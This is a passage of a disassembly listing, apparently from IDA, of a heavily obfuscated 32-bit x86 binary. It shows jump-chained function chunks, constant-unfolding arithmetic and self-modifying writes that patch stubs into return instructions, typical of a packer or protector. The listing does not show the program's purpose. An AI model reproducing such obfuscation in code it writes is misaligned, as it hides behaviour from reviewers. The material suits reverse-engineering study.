; [00000001 BYTES: COLLAPSED FUNCTION nullsub_224. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_45C083:				; CODE XREF: sub_457A46+13j
		jmp	loc_452D4D
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4564EB

loc_45C088:				; CODE XREF: sub_4564EB+Bj
		jmp	loc_44A50D
; END OF FUNCTION CHUNK	FOR sub_4564EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444463

loc_45C08D:				; CODE XREF: sub_444463+12j
		jmp	loc_45AFAA
; END OF FUNCTION CHUNK	FOR sub_444463
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D41D

loc_45C092:				; CODE XREF: sub_43D41D+Cj
		jmp	loc_45206E
; END OF FUNCTION CHUNK	FOR sub_43D41D

; =============== S U B	R O U T	I N E =======================================



sub_45C097	proc near		; DATA XREF: sub_43B2FD:loc_43DB0Co

var_4		= dword	ptr -4

		rol	eax, 1Ch
		push	edx
		mov	edx, eax
		xchg	edx, [esp+4+var_4]
		jmp	nullsub_428
sub_45C097	endp

; ---------------------------------------------------------------------------

loc_45C0A5:				; CODE XREF: y2kk37jd:00447B07j
		jz	loc_45A4DF
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_45C0AB:				; CODE XREF: sub_44001E:loc_447AE4j
		add	ecx, 0A396B8D8h
		or	ecx, 0D98AC8E0h
		add	ecx, 2497FB97h
		xchg	ecx, [esp+10h+var_10]
		jmp	loc_449156
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EEC8

loc_45C0C5:				; CODE XREF: sub_44EEC8+9j
		jz	loc_44D331
		jmp	loc_44F325
; END OF FUNCTION CHUNK	FOR sub_44EEC8
; ---------------------------------------------------------------------------

loc_45C0D0:				; CODE XREF: y2kk37jd:loc_44C704j
		pop	edx
		pop	esi
		jnb	loc_445037
		mov	eax, [esp]
		push	ecx
		jmp	loc_448FAE
; ---------------------------------------------------------------------------
		mov	eax, 851AF986h
		push	ecx
		push	607E7C9Bh
		pop	ecx
		add	ecx, 6A294863h
		and	ecx, 0DBCDC228h
		jmp	loc_444B60
; ---------------------------------------------------------------------------

loc_45C0FE:				; CODE XREF: y2kk37jd:0045124Bj
		jle	loc_4430E8

; =============== S U B	R O U T	I N E =======================================



sub_45C104	proc near		; CODE XREF: y2kk37jd:0044305Fp

; FUNCTION CHUNK AT 0043E84F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00441233 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00448750 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00457DE4 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	ebp, esp
		add	esp, 0FFFFFFF4h
		push	ebx
		push	38FDA3CEh
		pop	ebx
		jmp	loc_448750
sub_45C104	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_45C119:				; CODE XREF: sub_454C24-17D4Cj
		xor	eax, 0B204552Eh
		add	eax, ebp
		add	eax, 0F869CFAFh
		mov	eax, [eax]
; END OF FUNCTION CHUNK	FOR sub_454C24
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_45C129:				; CODE XREF: sub_4507BF-13E5Bj
		push	offset sub_44D6B0
		jmp	loc_444AF8
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_45C133:				; CODE XREF: sub_43C7B9+1F7F7j
		rol	edx, 10h
		adc	eax, 9165EF3Bh
		jmp	loc_455845
; END OF FUNCTION CHUNK	FOR sub_43C7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_45C141:				; CODE XREF: sub_43ED19:loc_45A9DEj
		jz	loc_4513C9
		jmp	loc_441B91
; END OF FUNCTION CHUNK	FOR sub_43ED19

; =============== S U B	R O U T	I N E =======================================



sub_45C14C	proc near		; CODE XREF: y2kk37jd:0043C889j
					; sub_445226-4E4Fp

; FUNCTION CHUNK AT 0045A7B0 SIZE 0000000C BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	esi
		pushf
		push	0EA692A8Dh
		pop	esi
		jmp	loc_45A7B0
sub_45C14C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45070F

loc_45C15D:				; CODE XREF: sub_45070F+Dj
					; y2kk37jd:loc_450AF7j
		mov	[ebp-4], eax

loc_45C160:				; CODE XREF: y2kk37jd:0044187Cj
					; y2kk37jd:00452E3Fj
		dec	ds:dword_446608
		push	5E6A26A3h
		pop	eax
		rol	eax, 1Dh
		jmp	loc_43C5F1
; END OF FUNCTION CHUNK	FOR sub_45070F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45C174:				; CODE XREF: sub_445226:loc_4560E7j
		jz	loc_44FA3A
		jmp	loc_43B9E3
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D627

loc_45C17F:				; CODE XREF: sub_44D627:loc_44E730j
					; sub_44D627+DACDj
		mov	eax, [esp+0]
		push	ebx
		mov	ebx, eax
		call	sub_446323
; END OF FUNCTION CHUNK	FOR sub_44D627
; START	OF FUNCTION CHUNK FOR sub_4441FF

loc_45C18A:				; CODE XREF: sub_4441FF+EE62j
		jmp	loc_43F499
; END OF FUNCTION CHUNK	FOR sub_4441FF
; ---------------------------------------------------------------------------

loc_45C18F:				; CODE XREF: y2kk37jd:0045231Ej
		jmp	loc_4421B2
; ---------------------------------------------------------------------------
		xor	eax, 0EEED32D7h
		push	eax
		jmp	sub_44606C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518C3

loc_45C1A0:				; CODE XREF: sub_4518C3:loc_459978j
		pop	edi
		sub	edi, 26C3D91Ah
		rol	edi, 0Bh
		and	edi, ds:4000EAh
		call	sub_453B95
; END OF FUNCTION CHUNK	FOR sub_4518C3
; START	OF FUNCTION CHUNK FOR sub_457D5A

loc_45C1B5:				; CODE XREF: sub_457D5A-27E5j
		jmp	sub_45AC4B
; END OF FUNCTION CHUNK	FOR sub_457D5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468E0

loc_45C1BA:				; CODE XREF: sub_4468E0-A9D6j
		jmp	loc_4581FE
; END OF FUNCTION CHUNK	FOR sub_4468E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_45C1BF:				; CODE XREF: sub_4597AE:loc_444883j
		lea	eax, nullsub_5
		mov	byte ptr [eax],	0C3h
		jmp	loc_44ECD4
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		jmp	loc_4471FC
; ---------------------------------------------------------------------------

loc_45C1D6:				; CODE XREF: y2kk37jd:0044E51Ej
		mov	edi, ebx
		sub	esi, 0D2F1BC7Ah
		jmp	loc_43B270
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442081

loc_45C1E3:				; CODE XREF: sub_442081+Ej
		jnb	loc_4438C9
		sub	al, 99h
		push	0FF83C531h
		pop	edx
		sub	edx, 73E1939Dh
		and	edx, 0EE9CC950h
		jmp	loc_43F6D3
; END OF FUNCTION CHUNK	FOR sub_442081
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447F91

loc_45C202:				; CODE XREF: sub_447F91:loc_455D52j
		ror	ebx, 17h
		push	edx
		and	esi, 0A35CC98Bh
		adc	ecx, 874D1417h
		push	0A810081Dh
		jmp	loc_447B9A
; END OF FUNCTION CHUNK	FOR sub_447F91

; =============== S U B	R O U T	I N E =======================================



sub_45C21C	proc near		; CODE XREF: y2kk37jd:004491FEj
					; sub_43F75D+133D5p

arg_0		= dword	ptr  4

		xchg	edx, [esp+0]
		pop	edx
		add	ecx, 30E30DF6h
		xchg	ecx, [esp-4+arg_0]

loc_45C229:				; CODE XREF: sub_43F911:loc_459C75j
		jmp	sub_45C4C8
sub_45C21C	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_65. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F086

loc_45C22F:				; CODE XREF: sub_44F086+20E0j
					; y2kk37jd:00457671j
		jz	loc_451D4E
; END OF FUNCTION CHUNK	FOR sub_44F086
; START	OF FUNCTION CHUNK FOR sub_448573

loc_45C235:				; CODE XREF: sub_448573+7j
		jmp	loc_446A9B
; END OF FUNCTION CHUNK	FOR sub_448573
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480D8

loc_45C23A:				; CODE XREF: sub_4480D8-959j
		jmp	nullsub_461
; END OF FUNCTION CHUNK	FOR sub_4480D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_45C23F:				; CODE XREF: sub_45ADEC-14A60j
		jmp	loc_446AAA
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; ---------------------------------------------------------------------------
		dd 0CFB8F881h, 0F7E9D578h
		db 5Ah,	2 dup(0FFh)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_407. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_45C250	proc near		; CODE XREF: sub_4420D3+Fp
					; y2kk37jd:0044A0EAj
		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_442C3E
		mov	ds:off_41E094, eax
		lea	eax, sub_44A3E7
		mov	byte ptr [eax],	0C3h
		jmp	sub_44A3E7
sub_45C250	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A3E7

loc_45C26D:				; CODE XREF: sub_44A3E7+1j
		call	sub_4480CB

loc_45C272:				; CODE XREF: y2kk37jd:0044BCCFj
		jmp	loc_455192
; END OF FUNCTION CHUNK	FOR sub_44A3E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_45C277:				; CODE XREF: sub_45689F:loc_43B95Cj
					; sub_45689F+CE7j
		push	2
		push	400h
		lea	eax, [ebp-400h]
		push	edx
		mov	edx, eax
		push	offset sub_43C512
		jmp	loc_459AE6
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------

loc_45C291:				; CODE XREF: y2kk37jd:loc_453A6Aj
		add	esi, 5A684E97h
		and	esi, 4B1BF241h
		sub	esi, 34514E5Bh
		add	esi, 0B82EE1E3h
		add	esi, ebp
		add	esi, 3921AA5Bh
		jmp	loc_43F39C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_45C2B6:				; CODE XREF: sub_43ED19+CDFFj
		mov	ecx, [eax]
		push	ebx
		push	82CB366Fh
		pop	ebx
		xor	ebx, 96AC1B23h
		jmp	loc_446A8A
; END OF FUNCTION CHUNK	FOR sub_43ED19

; =============== S U B	R O U T	I N E =======================================



sub_45C2CA	proc near		; DATA XREF: sub_45C01A-5958o
		xchg	eax, [esp+0]
		jmp	loc_445512
sub_45C2CA	endp


; =============== S U B	R O U T	I N E =======================================



sub_45C2D2	proc near		; DATA XREF: sub_43D41D:loc_455C4Bo

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00457EE3 SIZE 00000005 BYTES

		add	edx, 812250D3h
		popf
		xchg	edx, [esp-4+arg_0]
		jmp	loc_457EE3
sub_45C2D2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45C2E1	proc near		; CODE XREF: sub_4484F7-96F7p
					; y2kk37jd:004477E5p

var_8		= dword	ptr -8

		jnz	sub_4550D4
		push	ebp
		mov	ebp, esp
		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp+8+var_8]
		mov	esp, ebp
		xchg	eax, [esp+0]
		jmp	loc_43C346
sub_45C2E1	endp

; ---------------------------------------------------------------------------

loc_45C2FA:				; CODE XREF: y2kk37jd:00453D49j
		jns	loc_43E0C5
		ror	ebx, 7
		push	0FCAB1C06h
		pop	eax
		xor	eax, 2185966Dh
		sub	eax, 62F181E3h
		or	eax, 72C374D7h
		xor	eax, 9C550DD7h
		jmp	loc_44212E
; ---------------------------------------------------------------------------

loc_45C326:				; CODE XREF: y2kk37jd:00440C6Aj
		xor	ecx, 80AA560Fh
		or	ebx, esi
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_45C32E:				; CODE XREF: sub_448CAE-8051j
		add	eax, 0DD35A0D4h
		xchg	eax, [esp+4+var_4]
		jmp	loc_4533EC
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
		push	0D848A837h
		pop	edx
		or	edx, 15E6FE11h
		add	edx, 0C0959F4Ah
		jmp	loc_446654
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_168. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45C354:				; CODE XREF: y2kk37jd:0045A127j
		jmp	loc_44DBD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_45C359:				; CODE XREF: sub_43B0F5+1DBBFj
		jmp	loc_44C0F2
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B16

loc_45C35E:				; CODE XREF: sub_454B16+Cj
		jmp	loc_44CDB3
; END OF FUNCTION CHUNK	FOR sub_454B16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E25A

loc_45C363:				; CODE XREF: sub_43E25A+37D3j
					; sub_43E25A:loc_456938j
		call	sub_45405E
		mov	edx, 95918C9Dh
		call	sub_440CD1
		push	ebx
		push	offset sub_43EC0A
		jmp	loc_442FF0
; END OF FUNCTION CHUNK	FOR sub_43E25A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_45C37D:				; CODE XREF: sub_4577FE:loc_441738j
		and	edx, 0AD389712h
		sub	edx, 0A49A4175h
		js	loc_44C08C

loc_45C38F:				; CODE XREF: y2kk37jd:0044A451j
		jmp	loc_447E07
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4476EE

loc_45C394:				; CODE XREF: sub_4476EE+16j
		jmp	nullsub_432
; END OF FUNCTION CHUNK	FOR sub_4476EE
; ---------------------------------------------------------------------------
		jnb	loc_456BB9
		add	esi, edi
		jmp	loc_44C08C
; ---------------------------------------------------------------------------

loc_45C3A6:				; CODE XREF: y2kk37jd:0044845Cj
		jge	loc_459025

; =============== S U B	R O U T	I N E =======================================



sub_45C3AC	proc near		; CODE XREF: y2kk37jd:00441213p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00451436 SIZE 00000014 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	edi, [esp-4+arg_0]
		mov	eax, edi
		pop	edi
		add	eax, 22F87D03h
		and	eax, ds:4000EDh
		jmp	loc_451436
sub_45C3AC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443DB8

loc_45C3C7:				; CODE XREF: sub_443DB8:loc_453132j
		and	edi, 4EC53506h
		sub	edi, 0F04BC254h
		cmp	edi, 6F74B88Bh
		jmp	loc_45852D
; END OF FUNCTION CHUNK	FOR sub_443DB8
; ---------------------------------------------------------------------------
		call	sub_44A57D
; START	OF FUNCTION CHUNK FOR sub_44B924

loc_45C3E3:				; CODE XREF: sub_44B924-D6A8j
		jmp	loc_454168
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------

loc_45C3E8:				; CODE XREF: y2kk37jd:loc_446E3Ej
		sub	ecx, 99D16227h
		jns	loc_449D15
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_45C3F4:				; CODE XREF: sub_4411C3+19BC5j
		jmp	loc_449F46
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
		ror	edi, 14h
		sbb	ebp, 3ADEE3D1h
		jmp	loc_449D15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452A89

loc_45C407:				; CODE XREF: sub_452A89:loc_454FEEj
		call	sub_452665
		test	al, al
		call	sub_456D3F

loc_45C413:				; CODE XREF: sub_44113A+1A1F7j
		jmp	loc_453CD2
; END OF FUNCTION CHUNK	FOR sub_452A89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D8B6

loc_45C418:				; CODE XREF: sub_43D8B6+135E3j
		sub	edx, 396B0E9Eh
		add	edx, 6F01786Dh
		xchg	edx, [esp+0]
		jmp	loc_4536B0
; END OF FUNCTION CHUNK	FOR sub_43D8B6
; ---------------------------------------------------------------------------

loc_45C42C:				; CODE XREF: y2kk37jd:loc_44AB1Cj
		pushf
		push	0F226297Eh
		pop	eax
		add	eax, ds:4000E9h
		rol	eax, 13h
		jmp	loc_4533D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C01B

loc_45C441:				; CODE XREF: sub_44C01B+Aj
		call	sub_457DD3

loc_45C446:				; CODE XREF: y2kk37jd:0044E95Aj
		jmp	loc_459FD5
; END OF FUNCTION CHUNK	FOR sub_44C01B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_45C44B:				; CODE XREF: sub_456809-1377Ej
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443360

loc_45C450:				; CODE XREF: sub_443360+B8A2j
		jge	loc_44378F

loc_45C456:				; CODE XREF: sub_454E20-839Ej
		jmp	loc_45B65F
; END OF FUNCTION CHUNK	FOR sub_443360
; ---------------------------------------------------------------------------
		cdq
		or	ebp, ecx
		mov	[ebp+0], esi
		jmp	loc_44378A
; ---------------------------------------------------------------------------
		mov	[ecx], edx
		add	ebx, eax
		jmp	sub_43B06A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440040

loc_45C46F:				; CODE XREF: sub_440040:loc_45C6B3j
		jz	loc_43D2A4
		jmp	loc_45296F
; END OF FUNCTION CHUNK	FOR sub_440040
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451854

loc_45C47A:				; CODE XREF: sub_451854:loc_44F63Cj
		lea	eax, [ebp-20h]

loc_45C47D:				; CODE XREF: y2kk37jd:loc_45065Ej
		mov	dword ptr [eax], 594C4C4Fh
		push	2843877Ah
		pop	eax
		or	eax, 50263C8Fh
		sub	eax, 2BE1DE21h
		jmp	loc_45854A
; END OF FUNCTION CHUNK	FOR sub_451854
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_45C49A:				; CODE XREF: sub_4448E2:loc_447732j
		add	ecx, 7EBD3B0Eh
		xor	ecx, 0F88B0F22h
		add	eax, ecx
		pop	ecx
		ror	eax, 10h
		jmp	loc_452D5A
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
		not	ecx
		jmp	sub_43E456
; ---------------------------------------------------------------------------

loc_45C4B8:				; CODE XREF: y2kk37jd:loc_4539E0j
		call	sub_4526B7
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4593F8

loc_45C4BE:				; CODE XREF: sub_4593F8+10j
		jmp	loc_453645
; END OF FUNCTION CHUNK	FOR sub_4593F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B1D6

loc_45C4C3:				; CODE XREF: sub_43B1D6+Bj
		jmp	loc_43C5C3
; END OF FUNCTION CHUNK	FOR sub_43B1D6

; =============== S U B	R O U T	I N E =======================================



sub_45C4C8	proc near		; CODE XREF: y2kk37jd:0043CEA6j
					; sub_43BD0D+404Dp ...

; FUNCTION CHUNK AT 00445B54 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458D02 SIZE 00000023 BYTES

		call	sub_44EFD5

loc_45C4CD:				; CODE XREF: sub_4420C5+9j
		jmp	loc_458D02
sub_45C4C8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444000

loc_45C4D2:				; CODE XREF: sub_444000-29E6j
		xchg	ebx, [ecx]
		sub	ebp, 7B2B7BA1h

loc_45C4DA:				; CODE XREF: sub_444000:loc_451906j
		push	0B6F62FE9h
		pop	eax
		rol	eax, 0Fh
		xor	eax, 3CADA26Ah
		and	eax, 0A08C3FA5h
		jmp	loc_44CCA0
; END OF FUNCTION CHUNK	FOR sub_444000
; ---------------------------------------------------------------------------

loc_45C4F4:				; CODE XREF: y2kk37jd:004460A4j
		jns	loc_447A12
		shl	eax, 0Dh
		jmp	loc_452B27
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44355A

loc_45C502:				; CODE XREF: sub_44355A+Dj
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_492
; END OF FUNCTION CHUNK	FOR sub_44355A
; ---------------------------------------------------------------------------
		xchg	esi, [esp]
		mov	edx, esi
		pop	esi
		push	offset loc_43EBD9
		jmp	nullsub_258
; ---------------------------------------------------------------------------

loc_45C51A:				; CODE XREF: y2kk37jd:0044B325j
		lea	eax, nullsub_13

loc_45C520:				; CODE XREF: y2kk37jd:00455F5Aj
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_13
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edx
		push	edx
		jmp	loc_45847E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452441

loc_45C533:				; CODE XREF: sub_452441+12j
					; sub_445B38:loc_4565B3j
		call	sub_44A48B
		mov	edi, [ebp+0]
		cdq
		jmp	sub_4456D8
; END OF FUNCTION CHUNK	FOR sub_452441
; ---------------------------------------------------------------------------
		jbe	loc_453FD1
		jmp	loc_443345
; ---------------------------------------------------------------------------

loc_45C54C:				; DATA XREF: sub_44314E:loc_44DCC0o
		rol	eax, 3
		push	offset loc_44DB2B
		jmp	locret_44EB9D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_45C559:				; CODE XREF: sub_44610D:loc_448A93j
		jz	loc_452F6F
		jmp	loc_448ADD
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_45C564:				; CODE XREF: sub_43EF4F:loc_44CBAFj
		push	offset sub_43B1FD
		jmp	loc_44675D
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F567

loc_45C56E:				; CODE XREF: sub_43F567+CF6Ej
		push	ecx
		jmp	loc_457C2B
; END OF FUNCTION CHUNK	FOR sub_43F567
; ---------------------------------------------------------------------------
		sbb	ebp, 0B30D91DAh
		jmp	sub_4507BF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_318. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45C580:				; CODE XREF: y2kk37jd:0044DE63j
		and	eax, 818A0513h
		add	eax, 0EED61591h
		call	sub_442C3E
		push	edx
		jmp	loc_45BFA0
; ---------------------------------------------------------------------------
		db 0D8h
dword_45C598	dd 0A184356Ch		; DATA XREF: sub_4424CA+6r
					; sub_4448E2+15A6w ...
; ---------------------------------------------------------------------------

loc_45C59C:				; CODE XREF: y2kk37jd:00459DA0j
		jmp	loc_43EBBD

; =============== S U B	R O U T	I N E =======================================



sub_45C5A1	proc near		; CODE XREF: sub_40477B+40p
					; sub_40FE06+222p ...
		call	sub_45C5C5
		jmp	ds:off_41E1AC
sub_45C5A1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C326

loc_45C5AC:				; CODE XREF: y2kk37jd:0044C725j
					; sub_43C326+1F3E2j
		jmp	nullsub_434
; END OF FUNCTION CHUNK	FOR sub_43C326
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_45C5B1:				; CODE XREF: sub_443AA7+168B6j
		jmp	nullsub_435
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------

loc_45C5B6:				; CODE XREF: y2kk37jd:0045093Ej
		jmp	loc_457B63
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B41E

loc_45C5BB:				; CODE XREF: sub_45B41E-12333j
		jmp	sub_44113A
; END OF FUNCTION CHUNK	FOR sub_45B41E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453A10

loc_45C5C0:				; CODE XREF: sub_453A10-11C01j
		jmp	loc_452CE1
; END OF FUNCTION CHUNK	FOR sub_453A10

; =============== S U B	R O U T	I N E =======================================



sub_45C5C5	proc near		; CODE XREF: sub_457C64:loc_44EB9Ej
					; sub_448700:loc_459EA0j ...
		push	offset sub_458834
		jmp	nullsub_437
sub_45C5C5	endp


; =============== S U B	R O U T	I N E =======================================



sub_45C5CF	proc near		; CODE XREF: y2kk37jd:00449CF3j
					; sub_440D2A+1B195p

; FUNCTION CHUNK AT 00440218 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00450435 SIZE 00000003 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	eax, ecx
		pop	ecx
		xor	eax, 0BEEEF17h
		jnz	loc_450435
		ror	eax, 1Ah
		jmp	loc_440218
sub_45C5CF	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_298. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44132A

loc_45C5EB:				; CODE XREF: sub_44132A+AE0Cj
		jmp	sub_4487FD
; END OF FUNCTION CHUNK	FOR sub_44132A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457689

loc_45C5F0:				; CODE XREF: sub_457689-D7A4j
		jmp	sub_447D42
; END OF FUNCTION CHUNK	FOR sub_457689
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_45C5F5:				; CODE XREF: sub_4458DD+339Ej
		jmp	loc_4580D8
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B08

loc_45C5FA:				; CODE XREF: sub_455B08-119E5j
		and	ecx, 32F96640h
		or	ecx, 9A615C01h
		xor	ecx, 7026FEDCh
		add	ecx, ebp

loc_45C60E:				; CODE XREF: sub_43F8B8:loc_453ED4j
		add	ecx, 35A87D0Bh
		mov	ecx, [ecx]
		and	ecx, 7
		call	sub_4576F6

loc_45C61E:				; CODE XREF: y2kk37jd:004542C6j
		jmp	loc_44B96E
; END OF FUNCTION CHUNK	FOR sub_455B08
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452665

loc_45C623:				; CODE XREF: sub_452665+6j
		jmp	loc_44BB5D
; END OF FUNCTION CHUNK	FOR sub_452665
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44314E

loc_45C628:				; CODE XREF: sub_44314E-4501j
		jz	loc_449184
		jmp	loc_44AFC9
; END OF FUNCTION CHUNK	FOR sub_44314E
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D412

loc_45C634:				; CODE XREF: sub_43D412+1A920j
		jmp	loc_4565D4
; END OF FUNCTION CHUNK	FOR sub_43D412
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4540F2

loc_45C639:				; CODE XREF: sub_4540F2+7j
		push	edi
		push	0AD2A7498h
		pop	edi
		jmp	loc_450258
; END OF FUNCTION CHUNK	FOR sub_4540F2
; ---------------------------------------------------------------------------
		push	0F5F888E1h
		pop	edx
		sub	edx, 467CA388h
		xor	edx, 460C682Dh
		rol	edx, 4
		xor	edx, 0F8A6CDDFh
		call	sub_44291B
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_45C665:				; CODE XREF: sub_43F911+1954Aj
		jmp	loc_442494
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_45C66A:				; CODE XREF: sub_4448E2+91EBj
		jmp	loc_44C542
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444DF4

loc_45C66F:				; CODE XREF: sub_444DF4-91F1j
		jmp	loc_454FC3
; END OF FUNCTION CHUNK	FOR sub_444DF4
; ---------------------------------------------------------------------------

loc_45C674:				; CODE XREF: y2kk37jd:loc_456C06j
		xchg	eax, [esp]
		mov	edx, eax
		pop	eax
		lea	eax, nullsub_480
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_480
; ---------------------------------------------------------------------------
		xchg	ecx, [esp]
		mov	edx, ecx
		jmp	loc_44EF3D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443D4D

loc_45C692:				; CODE XREF: sub_443D4D+Ej
		push	edi
		push	0CC91B5FDh
		pop	edi
		sub	edi, 1F3574D5h
		jmp	loc_454F9F
; END OF FUNCTION CHUNK	FOR sub_443D4D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B4

